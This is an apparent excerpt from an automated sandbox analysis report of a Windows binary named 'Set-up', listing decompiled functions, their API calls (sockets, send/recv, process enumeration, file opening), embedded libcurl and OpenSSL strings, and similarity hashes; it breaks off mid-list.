                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorLast_errnofopenstrlen$_wfopen
                                • String ID:
                                • API String ID: 2867842857-0
                                • Opcode ID: fb6ce71668cc4e0553679f4ddb62e0cf49097eeb4cc5e79673ab897da9c38489
                                • Instruction ID: b282dfa84373bab4bbe6272d70b1a88efde71282803e50b3b0a3bc76e57046e5
                                • Opcode Fuzzy Hash: fb6ce71668cc4e0553679f4ddb62e0cf49097eeb4cc5e79673ab897da9c38489
                                • Instruction Fuzzy Hash: 1731C279260241BBEF206F76DC49F6B3B69FB45715F148538FA12C92D0EB309910CB61
                                Function 00148B50 Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 263networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1092 148b50-148b69 1093 148be6 1092->1093 1094 148b6b-148b74 1092->1094 1097 148be9 1093->1097 1095 148b76-148b8d 1094->1095 1096 148beb-148bf2 1094->1096 1098 148bf3-148bfe call 14a550 1095->1098 1099 148b8f-148ba7 call 126e40 1095->1099 1097->1096 1104 148de4-148def 1098->1104 1105 148c04-148c08 1098->1105 1106 148bad-148baf 1099->1106 1107 148cd9-148d16 SleepEx getsockopt 1099->1107 1114 148df5-148e19 call 14a150 WSASetLastError 1104->1114 1115 148e8c-148e95 1104->1115 1108 148dbd-148dc3 1105->1108 1109 148c0e-148c1d 1105->1109 1110 148bb5-148bb9 1106->1110 1111 148ca6-148cb0 1106->1111 1112 148d22 1107->1112 1113 148d18-148d20 WSAGetLastError 1107->1113 1108->1097 1117 148c35-148c48 WSAGetLastError call 14a150 1109->1117 1118 148c1f-148c2f connect 1109->1118 1110->1096 1119 148bbb-148bc2 1110->1119 1111->1107 1116 148cb2-148cb8 1111->1116 1120 148d26-148d39 1112->1120 1113->1120 1133 148e88 1114->1133 1134 148e1b-148e26 1114->1134 1121 148e97-148e9c 1115->1121 1122 148f00-148f06 1115->1122 1125 148ddc-148dde 1116->1125 1126 148cbe-148cd4 call 14b180 1116->1126 1136 148c4d-148c4f 1117->1136 1118->1117 1119->1096 1128 148bc4-148bcc 1119->1128 1129 148d43-148d61 call 12d8c0 call 14a150 1120->1129 1130 148d3b-148d3d 1120->1130 1131 148e9e-148eb6 call 122a00 1121->1131 1132 148edf-148eef call 1178b0 1121->1132 1122->1096 1125->1097 1125->1104 1126->1104 1138 148bd4-148bda 1128->1138 1139 148bce-148bd2 1128->1139 1164 148d66-148d74 1129->1164 1130->1125 1130->1129 1131->1132 1156 148eb8-148edd call 123410 * 2 1131->1156 1153 148ef2-148efc 1132->1153 1133->1115 1142 148e2e-148e85 call 12d090 call 154fd0 1134->1142 1143 148e28-148e2c 1134->1143 1145 148c51-148c58 1136->1145 1146 148c8e-148c93 1136->1146 1138->1096 1148 148bdc-148be1 1138->1148 1139->1096 1139->1138 1142->1133 1143->1133 1143->1142 1145->1146 1152 148c5a-148c62 1145->1152 1157 148dc8-148dd9 call 14b100 1146->1157 1158 148c99-148c9f 1146->1158 1154 148dac-148db8 call 1550a0 1148->1154 1161 148c64-148c68 1152->1161 1162 148c6a-148c70 1152->1162 1153->1122 1154->1096 1156->1153 1157->1125 1158->1111 1161->1146 1161->1162 1162->1146 1170 148c72-148c8b call 1550a0 1162->1170 1164->1096 1166 148d7a-148d81 1164->1166 1166->1096 1172 148d87-148d8f 1166->1172 1170->1146 1175 148d91-148d95 1172->1175 1176 148d9b-148da1 1172->1176 1175->1096 1175->1176 1176->1096 1180 148da7 1176->1180 1180->1154
                                APIs
                                • connect.WS2_32(?,?,00000001), ref: 00148C2F
                                • WSAGetLastError.WS2_32 ref: 00148C39
                                • SleepEx.KERNELBASE(00000000,00000000), ref: 00148CF3
                                • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00148D0E
                                • WSAGetLastError.WS2_32 ref: 00148D18
                                • WSASetLastError.WS2_32(00000000), ref: 00148E0C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ErrorLast$Sleepconnectgetsockopt
                                • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                • API String ID: 2513251565-879669977
                                • Opcode ID: fd1e0fd90eee1459b6bdedaabf90a5fbe6d8051a4d858fde47008c49bef4e895
                                • Instruction ID: f133e657bb255a9bbec497ee78849d820744d31e168e514c81c6c63131676a73
                                • Opcode Fuzzy Hash: fd1e0fd90eee1459b6bdedaabf90a5fbe6d8051a4d858fde47008c49bef4e895
                                • Instruction Fuzzy Hash: 80B1C170604305AFD710CF24C885BAABBE1EF55328F048529FC599B2E2DB70EC59CB61
                                Function 001176A0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 69networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1321 1176a0-1176be 1322 1176c0-1176c7 1321->1322 1323 1176e6-1176f2 send 1321->1323 1322->1323 1324 1176c9-1176d1 1322->1324 1325 1176f4-117709 call 1172a0 1323->1325 1326 11775e-117762 1323->1326 1327 1176d3-1176e4 send 1324->1327 1328 11770b-117759 call 1172a0 __acrt_iob_func call 11cb20 fflush _errno 1324->1328 1325->1326 1327->1325 1328->1326
                                APIs
                                • send.WS2_32(multi.c,?,?,?), ref: 001176DE
                                • send.WS2_32(multi.c,?,?,?), ref: 001176EA
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00117721
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00117745
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011774D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: send$__acrt_iob_func_errnofflush
                                • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                • API String ID: 3540913164-3388739168
                                • Opcode ID: d70bd25fe905a51ff82916103480c15c81efdb2d42cc972b62a504975dee3009
                                • Instruction ID: 5c59a24f9290d8819e1fbbc21ce3fc87c70e8b908ec3bf84b85fc31c7a6204c4
                                • Opcode Fuzzy Hash: d70bd25fe905a51ff82916103480c15c81efdb2d42cc972b62a504975dee3009
                                • Instruction Fuzzy Hash: 1E112BB590D394AFE114AB159C49D673B7DEBC2B68F050928F80863391DB719C40C7B1
                                Function 002947B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 95stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1335 2947b0-2947bf call 2ee5d0 1337 2947c4-2947dd strchr 1335->1337 1338 2947df-2947f2 call 28d520 1337->1338 1339 294824-29485e call 2c7120 call 2c7220 GetLastError call 2c7310 _errno 1337->1339 1344 2947f8-29481f call 28d690 call 28df50 1338->1344 1345 29488d-294896 fclose 1338->1345 1356 29486b-29488b call 2c7120 call 2c7220 1339->1356 1357 294860-294869 _errno 1339->1357 1352 2948c4-2948cb 1344->1352 1348 2948c2 1345->1348 1348->1352 1366 2948b8-2948bf call 2c7310 1356->1366 1357->1356 1359 294898-2948b3 call 2c7120 call 2c7220 1357->1359 1359->1366 1366->1348
                                APIs
                                  • Part of subcall function 002EE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE5E2
                                  • Part of subcall function 002EE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,00000001,00000000,00000000,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?), ref: 002EE5FA
                                  • Part of subcall function 002EE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001), ref: 002EE637
                                  • Part of subcall function 002EE5D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(0027A31E), ref: 002EE64D
                                  • Part of subcall function 002EE5D0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0027A31E,00000001,?,00000008,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000), ref: 002EE665
                                  • Part of subcall function 002EE5D0: _wfopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE678
                                  • Part of subcall function 002EE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE685
                                  • Part of subcall function 002EE5D0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E,?,00747B34), ref: 002EE690
                                  • Part of subcall function 002EE5D0: fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,0027A31E,?,?,?,?,00000000,002947C4,?,00000000,00000000,00000000,?,00000000,?,0027A31E), ref: 002EE6A6
                                • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000062,?,00747B34), ref: 002947CC
                                • GetLastError.KERNEL32(?,?,?,?,?,?,00747B34), ref: 0029483D
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00747B34), ref: 00294855
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00747B34), ref: 00294860
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,00747B34), ref: 0029488E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _errno$ByteCharMultiWide$strlen$ErrorLast_wfopenfclosefopenstrchr
                                • String ID: BIO_new_file$calling fopen(%s, %s)$crypto/bio/bss_file.c
                                • API String ID: 3063597995-203430365
                                • Opcode ID: 9665eb1cb9367036a26055699c1710966f1b995df39463d113b2d8dc8e551b5d
                                • Instruction ID: 1c515a9dd71dc34f9a453451951a0234ce25f306df7d3796fbfedb42b315d7ab
                                • Opcode Fuzzy Hash: 9665eb1cb9367036a26055699c1710966f1b995df39463d113b2d8dc8e551b5d
                                • Instruction Fuzzy Hash: 5321C5E5BE53417BE52036613C07F1B3A489B62B99F090128FA09652C3EA9969358DB3
                                Function 001131D7 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73processCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID: CreateToolhelp32Snapshot failed.$name$pid$processes
                                • API String ID: 420147892-2059488242
                                • Opcode ID: e55e2ab02c353fdc7afba9f964aba512da88e284d97cd36ea04e87de40655b9f
                                • Instruction ID: a444e7a6ee388bc1ef914dfc5e14bb3d9fe8abef1103cfae938f1e6e83c50a43
                                • Opcode Fuzzy Hash: e55e2ab02c353fdc7afba9f964aba512da88e284d97cd36ea04e87de40655b9f
                                • Instruction Fuzzy Hash: 0231B4B09053189FCB40EFB8D58569EBBF1AF44304F01896DE899E7341EB349A84CF92
                                Function 00117770 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1394 117770-11778e 1395 117790-117797 1394->1395 1396 1177b6-1177c2 recv 1394->1396 1395->1396 1397 117799-1177a1 1395->1397 1398 1177c4-1177d9 call 1172a0 1396->1398 1399 11782e-117832 1396->1399 1400 1177a3-1177b4 recv 1397->1400 1401 1177db-117829 call 1172a0 __acrt_iob_func call 11cb20 fflush _errno 1397->1401 1398->1399 1400->1398 1401->1399
                                APIs
                                • recv.WS2_32(?,?,001494BF,?), ref: 001177AE
                                • recv.WS2_32(?,?,001494BF,?), ref: 001177BA
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000630,cf-socket.c), ref: 001177F1
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00117815
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0011781D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: recv$__acrt_iob_func_errnofflush
                                • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                • API String ID: 2542159810-640788491
                                • Opcode ID: 06071abef6728305a774704deac1d1514e799be07da9adbafb1180bf754db78f
                                • Instruction ID: b570f905c47cdcfcd3925fbeb04fbb33509c865a346027665c02b49eb48f3091
                                • Opcode Fuzzy Hash: 06071abef6728305a774704deac1d1514e799be07da9adbafb1180bf754db78f
                                • Instruction Fuzzy Hash: FC1108B5909394AFD114AB159C4DD673B6DEBC6B68F050A28F908633D1D7719C40C6F1
                                Function 001175E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 63networkCOMMON
                                Download Yara Rule
                                APIs
                                • socket.WS2_32(?,?,?), ref: 00117618
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00117659
                                • fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 0011767D
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00117685
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: __acrt_iob_func_errnofflushsocket
                                • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                • API String ID: 166263346-842387772
                                • Opcode ID: 4807b7593a6f9434a60f56110e6f229566716103763822acc9a82844db8141d8
                                • Instruction ID: 8910d2ad258e673ecd573453ddf3e7a2005abf9f8d7a7d8435b5997eb16078fe
                                • Opcode Fuzzy Hash: 4807b7593a6f9434a60f56110e6f229566716103763822acc9a82844db8141d8
                                • Instruction Fuzzy Hash: 44115C326096916FD6102B29AC06E873B69EFC1724F050524F804A33E1D7358C90C7D1
                                Function 0049D1D0 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON
                                Download Yara Rule
                                APIs
                                • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0049D1E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: _errno
                                • String ID: @$Inf$NaN
                                • API String ID: 2918714741-141429178
                                • Opcode ID: b6351563307c2715920716855d317cfce86c50102a939ee5d498946dce6bf20c
                                • Instruction ID: a7d0149f2a89ef0b70581f3ed079e1337843c3fbc936cacd11c5ef53390c4473
                                • Opcode Fuzzy Hash: b6351563307c2715920716855d317cfce86c50102a939ee5d498946dce6bf20c
                                • Instruction Fuzzy Hash: 68F19174A0C3858BDB319F24C4407ABBFE1BB85314F158A6ED9DD87381D7399906CB8A
                                Function 001C4950 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 167networkstringCOMMON
                                Download Yara Rule
                                APIs
                                • htonl.WS2_32(7F000001), ref: 001C4A21
                                • gethostname.WS2_32(00000000,00000040), ref: 001C4AA4
                                • WSAGetLastError.WS2_32 ref: 001C4AB3
                                • strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000002E), ref: 001C4B3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767608606.00000000006E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767621658.00000000006E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767708497.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767735572.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767748531.0000000000845000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_110000_Set-up.jbxd
                                Similarity
                                • API ID: ErrorLastgethostnamehtonlstrchr
                                • String ID: xc$|c
                                • API String ID: 655544046-3962473566
                                • Opcode ID: 9071436e96528c57824f6a35eac8ca557717452cbc3179863265c60cc4c631f4
                                • Instruction ID: 091778695e24e7f4330eb2d0c100981685f0b3b77225c9a9367df0137fdeb603
                                • Opcode Fuzzy Hash: 9071436e96528c57824f6a35eac8ca557717452cbc3179863265c60cc4c631f4
                                • Instruction Fuzzy Hash: 3951D0706087018FE7309B65DD59B237AE4EF25319F14093CE98A866D1E779EC44CB02
                                Function 00149290 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 143networkCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 001176A0: send.WS2_32(multi.c,?,?,?), ref: 001176DE
                                • WSAGetLastError.WS2_32 ref: 001493C3
                                  • Part of subcall function 0012D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,001201B1), ref: 0012D8E2
                                • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0014935C
                                • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004), ref: 00149388
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1767167567.0000000000111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                • Associated: 00000000.00000002.1767154211.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.000000000063C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767522836.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767567457.00000000006DB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767580643.00000000006DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1767594939.00000000006DF000.00000008.00000001.01000000.00000003.sdmpDownload File
